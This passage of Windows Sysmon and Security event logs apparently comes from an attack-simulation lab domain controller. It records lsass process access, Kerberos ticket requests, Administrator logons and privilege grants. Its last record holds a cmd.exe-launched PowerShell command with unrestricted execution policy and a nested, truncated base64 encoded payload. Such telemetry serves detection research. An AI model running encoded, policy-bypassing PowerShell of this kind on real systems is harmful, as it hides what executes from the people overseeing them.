05:52:13.795","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1776","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010EC520600}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220469,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220470,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220471,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220472,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6558B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6558b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220473,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6558B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6558b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.815\r\nProcessGuid: {A837DB8D-030D-5F25-0000-0010BE550600}\r\nProcessId: 4980\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUA